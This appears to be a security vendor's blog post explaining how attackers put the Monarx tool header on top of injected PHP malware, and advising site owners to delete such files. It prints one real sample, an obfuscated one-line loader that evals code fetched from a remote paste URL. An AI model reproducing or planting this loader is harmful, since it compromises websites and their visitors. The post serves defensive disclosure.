The Irony of Success

Monarx stands on the frontlines of cyber security, offering robust anti-malware solutions to web hosting providers. Its tools defend sites against everything from webshells and phishing to cryptominers and spam. Our platform ensures not only the security of Mom and Pop websites but also the overall health of the online ecosystem. Unfortunately, as happens with every security vendor of sufficient size, attackers have started to use our brand to deliver and hide their malware.


The most common example of this is simply injecting malicious code into one of our site cleaning tools. While not particularly clever, it is extremely effective. The average person has no idea who wrote what, or even what the code in that file does. They shouldn’t have to. Unfortunately, not knowing means that the nice “Monarx Security Tool” banner makes it look like Monarx is the author of malware.


To be clear: we have never, will never, infect anyone’s website. Our job is to defend the site owners from cyber-attacks, and we are passionate about doing just that.


How It Works

As mentioned, the mechanism isn’t complicated, just effective. Our site cleaning tools start with a banner to help identify them to anyone who happens to see them on disk while we are working.

That banner looks something like:

==========================================================================
    ___  ___
    |  \/  | Copyright (C) 2017-2023, Monarx, Inc.
    | .  . |  ___   _ __    __ _  _ __ __  __
    | |\/| | / _ \ | '_ \  / _` || '__|\ \/ /
    | |  | || (_) || | | || (_| || |    >  <
    \_|  |_/ \___/ |_| |_| \__,_||_|   /_/\_\

==========================================================================
@package    Monarx Security Site Analyzer
@file       monarx-analyzer.php
@copyright  Monarx, Inc. Not for external use, redistribution, or sale.
@site       https://www.monarx.com

Nothing crazy, just some basic information at the top of the file before the code for our actual tool.
Attackers take that and put it on top of their malware. A recent example:

<?php
/**=======================================================================
    ___  ___
    |  \/  | Copyright (C) 2017-2023, Monarx, Inc.
    | .  . |  ___   _ __    __ _  _ __ __  __
    | |\/| | / _ \ | '_ \  / _` || '__|\ \/ /
    | |  | || (_) || | | || (_| || |    >  <
    \_|  |_/ \___/ |_| |_| \__,_||_|   /_/\_\

=============================================================================
@package    Monarx Security Site Analyzer
@file       monarx-analyzer.php
@copyright  Monarx, Inc. Not for external use, redistribution, or sale.
@site       https://www.monarx.com
==========================================================================
<?=/****/@null; /********/ /*******/ /********/@eval/****/("?>".file_get_contents/*******/("https://rentry.co/gdm89/raw"));/**/?>


Word to the wise: don’t fetch that file and run it.

None of that garbage is our code. Not only is it poorly written, even for malware, it also doesn’t do anything except fetch and run another resource (the real malware). That’s very common for an injection (you don’t want to cram a ton of content into an otherwise good file, just enough to go and get the bad stuff). It’s also completely and utterly pointless for the actual authors of the file. If we wanted that content to be executed, we’d have just written it in the file.

It does have our header on it though, and our brand with it.

What Can Website Owners Do?

If you see a file with that Monarx Security header, delete it. Our tool isn’t intended to remain on disk after it’s used (a few hundred milliseconds after it’s written). There are edge cases where the tool can’t be removed (how attackers got ahold of it) but it is always safe to remove. Indeed, we highly recommend that you do – what you’re looking at isn’t ours at all.


Contact us! If you see a file with our header on it, we would love to know about it. If you see any file that looks suspicious, we would love to hear about that too. Together we can do more than any of us can alone.


TL;DR:

Hackers have copied the Monarx source header and are using it to distribute malware. If you see a file with a Monarx header, delete it – it’s not ours.